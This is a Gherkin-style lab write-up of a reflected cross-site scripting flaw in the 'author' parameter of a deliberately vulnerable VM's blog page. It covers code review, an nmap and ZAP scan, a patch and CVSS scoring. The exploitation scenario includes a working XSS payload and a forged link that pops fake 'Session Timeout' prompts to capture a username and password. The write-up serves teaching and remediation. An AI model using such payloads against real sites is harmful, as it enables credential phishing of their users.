## Version 1.4.1
## language: en

Feature:
  TOE:
    Graceful’s VulnVM
  Location:
    http://192.168.0.27/blog.php - author (field)
  CWE:
    CWE-79: Improper Neutralization of Input
    During Web Page Generation ('Cross-site Scripting')
  Rule:
    REQ.173 R173. Discard unsafe inputs
  Goal:
    Get user Credentials
  Recommendation:
    Validate all input data

  Background:
  Hacker's software:
    | <Software name> | <Version>      |
    | Arch Linux      | 5.7.10-arch1-1 |
    | Chrome          | 86.0.4209.2    |
    | Nmap            | 7.8.0          |
    | OWASP ZAP       | 2.9.0          |

  TOE information:
    Given I am running the vulnerable machine at
    """
    192.168.0.27
    """

  Scenario: Normal use case
    Given I access to the site
    """
    http://192.168.0.27/blog.php
    """
    When The correct values for the parameter "author" are given
    Then I can filter by author posts [evidence](evidence.png)

  Scenario: Static detection
    Given The file
    """
    blog-content.php
    """
    When I look at the code I notice from lines 25 to 33
    """
    if ($_COOKIE["level"] = "1") {
        echo 'Couldn\'t find any posts by author: <span class="author-'
        . $_GET['author'] .'">' . htmlentities($_GET['author']) . '</span>.';
    }
    else {
        $author = $_GET["author"];
        $author = preg_replace("/<[A-Za-z0-9]/" , "", $author);
        $author = preg_replace("/on([a-z]+)/", "", $author);
        echo 'Couldn\'t find any posts by author: <span class="author-'
        . $author .'">' . htmlentities($author) . '</span>.';
    }
    """
    Then I can see the input validation is only made when level is not
    """
    1
    """
    And I can easily change the cookie values to skip the data validation

  Scenario: Dynamic detection
    Given I scan the target machine
    When I scan open ports with
    """
    $ nmap 192.168.0.27
    """
    Then I get the following output
    """
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-31 12:40 -05
    Nmap scan report for 192.168.0.27
    Host is up (0.00052s latency).
    Not shown: 999 filtered ports
    PORT   STATE SERVICE
    80/tcp open  http

    Nmap done: 1 IP address (1 host up) scanned in 15.27 seconds
    """
    And I enter in
    """
    http://192.168.0.27/
    """
    And I confirm that a web server is running
    Given I want to do an XSS exploit
    When I use
    """
    OWASP ZAP
    """
    Then I find the "author" field is vulnerable [evidence] (evidence-2.png)
    When I test the suggested address by "OWASP ZAP"
    """
    http://192.168.0.27/blog.php?author=%22%3E%3Cscript%3Ealert
    %281%29%3B%3C%2Fscript%3E
    """
    Then I get a Javascript alert in the screen
    And I can confirm that the exploit works

  Scenario: Exploitation
    Given I confirmed that an XSS attack is possible in
    """
    http://192.168.0.27/blog.php?author="><script>alert(1);</script>
    """
    When I create a script to insert
    """
    <script>alert("Session Timeout, Please provide your Credentials");
    var user = prompt("Username: "); var pwd = prompt("Email: ");
    </script><h1>Username is:
    <script type="text/javascript">document.write(user);</script>
    </h1><h2>Password is:
    <script type="text/javascript">document.write(pwd)</script></h2>
    """
    Then If a user access the forged link
    """
    http://192.168.0.27/blog.php?author="><script>alert("Session Timeout,
    Please provide your Credentials");
    var user = prompt("Username: "); var pwd = prompt("Email: ");
    </script><h1>Username is:
    <script type="text/javascript">document.write(user);</script>
    </h1><h2>Password is:
    <script type="text/javascript">document.write(pwd)</script></h2>
    """
    And follow the email prompt [evidence](evidence-3.png)
    And password prompt [evidence] (evidence-4.png)
    Then The user credentials will be shown [evidence](evidence-5.png)

  Scenario: Remediation
    Given The file that allows the XSS exploit
    """
    blog-content.php
    """
    When I delete the cookie comparison and make data validation always happen
    """
    $author = $_GET["author"];
    $author = preg_replace("/<[A-Za-z0-9]/" , "", $author);
    $author = preg_replace("/on([a-z]+)/", "", $author);
    echo 'Couldn\'t find any posts by author: <span class="author-'
    . $author .'">' . htmlentities($author) . '</span>.';
    """
    Then If I retry the exploit, the data validation is made
    And The page is shown in a correct way
    And I can confirm that the vulnerability has been patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    4.3/10 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.1/10 (Medium) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    3.5/10 (Low) - CR:L/MUI:R/MC:L

  Scenario: Correlations
    No correlations have been found to this date 2020-08-03
